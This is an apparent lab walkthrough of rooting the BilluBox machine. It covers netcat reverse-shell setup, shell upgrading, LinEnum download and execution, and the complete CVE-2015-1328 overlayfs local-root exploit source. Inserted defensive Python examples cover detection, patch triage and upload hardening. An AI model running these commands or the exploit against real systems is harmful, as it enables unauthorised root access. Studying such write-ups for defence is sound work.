Hello everyone,
Hurray, this will be my final post on the BilluBox penetration testing exercise, with a detailed description of the walkthrough.
In my last post I found another bug that can be exploited as an alternative way into the server: a malicious file upload, achieved by manipulating the image upload validation.
Another fatal bug we found is a file inclusion in the application, which can be exploited to load the malicious file we uploaded; that gave me remote code injection.
Let's begin our exploitation.
The attack path of this hack looks like the below:
- Activate the reverse shell
- Run LinEnum
- Examine the result
- Find a potential bug to escalate privileges
Activate the reverse shell
- Start your netcat listener on the chosen port
nc -nlvp 9091
- Let's generate the reverse shell using one-lin3r
– Let's check which scripting languages the server supports
– Let's check for python (locate python)
– We can see that python is installed on the server, so we can use a python script to create the reverse shell
– Start one-lin3r and generate the python code
- After the code generation is done, you can use your remote code injection to execute the python code on the remote host using Burp Suite
Don't forget to URL-encode your payload, since it contains special characters, so that it can be transferred via HTTP POST; it ends up looking like the below
Then post the request to the server and wait for the reverse connection to reach your netcat listener
Tips:
– The reverse shell needs to be upgraded to get the feel of a local console, such as tab completion, clear and many others. You can upgrade it using the commands below
– To activate a bash console on the remote host: python -c 'import pty; pty.spawn("/bin/bash")'
– To activate tab completion follow the sequence below
-> Ctrl + Z to background your current active reverse shell
-> stty raw -echo
-> fg to foreground the last backgrounded process
- Yes, we are now connected to our reverse shell. Next, run the Linux enumeration script
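From the defender's side, the sequence above leaves a recognisable trace: the web server's user (www-data) ends up owning an interpreter and a shell whose parent chain leads back to a web worker, and the pty upgrade shows up verbatim in the process arguments. The following is an added example, not code from the original post: it parses a `ps -eo pid,ppid,user,comm,args` listing and reports every shell or interpreter with a web-worker ancestor. The process names in WEB_WORKERS and INTERPRETERS and the sample listing are assumptions constructed for the demonstration.

```python
"""Detect shells and interpreters spawned beneath a web-server worker.

Added example (not from the original post). It walks a ps listing and flags
process chains such as apache2 -> sh -> python -> bash owned by www-data,
which is what the reverse shell and pty upgrade above look like on the host.
"""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid user comm args")

# Assumed process names; extend for your own stack.
WEB_WORKERS = {"apache2", "httpd", "nginx", "php-fpm", "php-fpm7.0"}
INTERPRETERS = {"sh", "bash", "dash", "python", "python2", "python3",
                "perl", "php", "nc", "ncat"}

# Constructed listing modelled on the post's scenario; not captured output.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND  ARGS
    1     0 root     init     /sbin/init
  801     1 root     apache2  /usr/sbin/apache2 -k start
  812   801 www-data apache2  /usr/sbin/apache2 -k start
  813   801 www-data apache2  /usr/sbin/apache2 -k start
 1507   812 www-data sh       sh -c python /var/tmp/r.py
 1508  1507 www-data python   python /var/tmp/r.py
 1512  1508 www-data python   python -c import pty; pty.spawn("/bin/bash")
 1513  1512 www-data bash     /bin/bash
 2001     1 root     sshd     /usr/sbin/sshd -D
 2050  2001 alice    bash     -bash
"""


def parse_ps(listing):
    """Build {pid: Proc} from a ps listing; the first line is the header."""
    procs = {}
    for line in listing.splitlines()[1:]:
        if not line.strip():
            continue
        pid, ppid, user, comm, args = line.split(None, 4)
        procs[int(pid)] = Proc(int(pid), int(ppid), user, comm, args)
    return procs


def ancestors(procs, pid):
    """Parents of pid, nearest first; stops at the root or on a cycle."""
    chain, seen = [], {pid}
    cur = procs.get(pid)
    while cur is not None and cur.ppid in procs and cur.ppid not in seen:
        cur = procs[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def find_web_spawned_shells(procs):
    """Findings for interpreter/shell processes that have a web-worker ancestor."""
    findings = []
    for p in sorted(procs.values()):
        if p.comm not in INTERPRETERS:
            continue
        path = []
        for a in ancestors(procs, p.pid):
            path.append(a)
            if a.comm in WEB_WORKERS:
                break
        else:
            continue  # no web worker above this process: an ordinary shell
        chain = " -> ".join(a.comm for a in reversed(path)) + " -> " + p.comm
        findings.append({
            "pid": p.pid,
            "user": p.user,
            "worker_pid": path[-1].pid,
            "chain": chain,
            # the pty upgrade from the tips above is visible in the arguments
            "pty_upgrade": "pty.spawn" in p.args,
        })
    return findings


if __name__ == "__main__":
    for f in find_web_spawned_shells(parse_ps(SAMPLE_PS)):
        flag = " [pty upgrade]" if f["pty_upgrade"] else ""
        print("pid %d (%s): %s%s" % (f["pid"], f["user"], f["chain"], flag))
```

The check is deliberately structural: it keys on the parent chain rather than on the payload text, so an encoded or renamed payload still triggers as long as the web worker ends up with a shell or interpreter beneath it. The `pty_upgrade` flag is a bonus signal, not the primary detection.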
– Download the Linux enumeration script onto the remote server (let's assume the remote server has internet access). Change directory to /tmp or any other directory you have write access to
– wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
– chmod +x LinEnum.sh
– ./LinEnum.sh
Output:
www-data@indishell:/var/tmp$ ./LinEnum.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# http://www.rebootuser.com
# version 0.95

[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
Sat Feb 2 14:31:54 IST 2019
### SYSTEM ##############################################
[-] Kernel information:
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
[-] Kernel information (continued):
Linux version 3.13.0-32-generic (buildd@toyol) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.5 LTS"
NAME="Ubuntu"
VERSION="12.04.5 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.5 LTS)"
VERSION_ID="12.04"
... truncated output ...
- Based on the output of LinEnum.sh we can see that the OS is Ubuntu 12.04 Precise Pangolin with kernel 3.13.0-32.
– Let's google for an exploit. I found the privilege escalation exploit on exploit-db at this URL: https://www.exploit-db.com/exploits/37292/

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);
        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");

    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
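What made the LinEnum output decisive was the match between the host's release and kernel build date and the affected set stated in the exploit header above: Ubuntu 12.04, 14.04, 14.10 and 15.04 with kernels built before 2015-06-15. The following is an added example, not code from the original post, from LinEnum or from the exploit author: it parses the `uname -a` and /etc/lsb-release lines that LinEnum printed and reports whether a host falls inside that window, so an administrator can triage a fleet before an attacker does. The build-date comparison is a heuristic taken from the header text; the "patched" counter-example line is constructed, and a real verdict should be confirmed against the vendor's advisory and installed package version.

```python
"""Triage LinEnum's kernel and release lines against the CVE-2015-1328 window.

Added example (not from the original post, LinEnum or the exploit). It uses
only the affected releases and fix date stated in the exploit header.
"""
import re
from datetime import datetime

AFFECTED_RELEASES = {"12.04", "14.04", "14.10", "15.04"}
FIX_DATE = datetime(2015, 6, 15)  # "Kernels before 2015-06-15" per the header

UNAME_RE = re.compile(
    r"^Linux\s+(?P<host>\S+)\s+(?P<kernel>\S+)\s+#\S+\s+SMP\s+"
    r"(?P<date>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d UTC \d{4})"
)

# Lines as LinEnum printed them on the target in this post.
LINENUM_UNAME = ("Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP "
                 "Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux")
LINENUM_LSB = """\
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.5 LTS"
"""
# Constructed counter-example: same release, kernel built after the fix date.
PATCHED_UNAME = ("Linux example-host 3.13.0-99-generic #999-Ubuntu SMP "
                 "Wed Jul 1 12:00:00 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux")


def parse_uname(line):
    """Extract host, kernel release string and build timestamp from uname -a."""
    m = UNAME_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised uname -a line: %r" % line)
    stamp = " ".join(m.group("date").split())  # collapse padded day numbers
    return {
        "host": m.group("host"),
        "kernel": m.group("kernel"),
        "build_date": datetime.strptime(stamp, "%a %b %d %H:%M:%S UTC %Y"),
    }


def parse_lsb_release(text):
    """KEY=VALUE lines into a dict, dropping surrounding quotes."""
    out = {}
    for line in text.splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            out[key.strip()] = value.strip().strip('"')
    return out


def assess_cve_2015_1328(uname_line, lsb_text):
    """Combine release membership and kernel build date into a triage verdict."""
    kern = parse_uname(uname_line)
    release = parse_lsb_release(lsb_text).get("DISTRIB_RELEASE", "")
    release_affected = release in AFFECTED_RELEASES
    built_before_fix = kern["build_date"] < FIX_DATE
    return {
        "host": kern["host"],
        "kernel": kern["kernel"],
        "release": release,
        "build_date": kern["build_date"].date().isoformat(),
        "release_affected": release_affected,
        "built_before_fix": built_before_fix,
        "likely_exposed": release_affected and built_before_fix,
    }


if __name__ == "__main__":
    for label, line in (("target", LINENUM_UNAME), ("patched", PATCHED_UNAME)):
        v = assess_cve_2015_1328(line, LINENUM_LSB)
        state = "likely exposed" if v["likely_exposed"] else "outside window"
        print("%s: %s built %s -> %s" % (label, v["kernel"], v["build_date"], state))
```

The same two inputs are what the system administrator's lesson below boils down to: a release that is still in the affected set combined with a kernel built before the fix date is the finding to act on, and the action is applying the distribution's kernel update rather than anything on the host itself.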
Yeah, finally we gained root access. This is the end of our penetration testing journey on BilluBox. This box is very good for exercises.
Lessons learned from the exploit
- A combination of mistakes made by the application developer and the OS administrator can result in the fatal incident of a server being hijacked
- System administrators should be aware that an operating system must be maintained not only for availability but also for security, at a minimum by deploying the latest required patches.
- Application developers should know the OWASP guidance, or the company could follow an SSDLC (Secure Software Development Life Cycle) methodology to develop their applications.
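The developer-side lesson maps onto the two application bugs recapped at the top of this post: an image upload whose validation could be manipulated, and a file inclusion that would load the uploaded file. The following is an added example, not code from the original post or from BilluBox, showing the two server-side controls that break that chain. The allowed image types, size limit, page table and directory layout are assumptions for the demonstration.

```python
"""Server-side controls that break the upload-then-include chain.

Added example (not from the original post or from BilluBox). Two ideas:
the upload never keeps a client-chosen name or extension, and the include
never builds a path from request input.
"""
import os
import re
import secrets

# extension -> (magic prefix, MIME type): only what the feature actually needs
ALLOWED_IMAGES = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "gif": (b"GIF8", "image/gif"),
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # assumed limit

# Fixed table for the include: request value -> file. No path is ever built
# from user input, so an uploaded file cannot be reached through it.
PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}
PAGES_DIR = "/var/www/app/pages"  # assumed layout


class UploadRejected(ValueError):
    pass


def validate_image_upload(filename, data):
    """Return (extension, mime) if every check passes, else raise UploadRejected."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("too large")
    base = os.path.basename(filename.replace("\\", "/"))
    # one short name and exactly one extension; no extra dots, slashes or NULs
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", base)
    if not m:
        raise UploadRejected("filename must be name.ext with safe characters")
    ext = m.group(1).lower()
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in ALLOWED_IMAGES:
        raise UploadRejected("extension not allowed")
    magic, mime = ALLOWED_IMAGES[ext]
    # Content must match the extension; the client's Content-Type header is ignored.
    if not data.startswith(magic):
        raise UploadRejected("content does not match extension")
    return ext, mime


def is_acceptable_upload(filename, data):
    """Boolean wrapper around validate_image_upload for callers that just need yes/no."""
    try:
        validate_image_upload(filename, data)
        return True
    except UploadRejected:
        return False


def store_upload(filename, data, upload_dir=None):
    """Validate, then store under a server-generated name. Returns the stored name."""
    ext, _ = validate_image_upload(filename, data)
    stored = secrets.token_hex(16) + "." + ext
    if upload_dir is not None:
        # upload_dir should sit outside the web root and outside any include path
        with open(os.path.join(upload_dir, stored), "wb") as fh:
            fh.write(data)
    return stored


def resolve_include(page):
    """Map the request parameter through the fixed table; unknown values are refused."""
    if page not in PAGES:
        raise ValueError("unknown page")
    return os.path.join(PAGES_DIR, PAGES[page])


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32            # constructed PNG prefix
    print(store_upload("avatar.png", png))                 # random hex name + .png
    print(is_acceptable_upload("avatar.php.png", png))     # False: double extension
    print(is_acceptable_upload("avatar.png", b"<?php"))    # False: content mismatch
    print(resolve_include("home"))
```

The magic-byte check alone is not what stops the chain: an image with script text appended still carries a valid PNG header. What removes the risk is that the stored file gets a random name with a server-chosen image extension in a directory the web server never executes from, and the include resolves only table entries, so nothing a client uploads can ever become an include target.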
In the next post I will guide you through covering your tracks after getting access to the server. This is called a post-exploitation task.
OK, see you in the next post.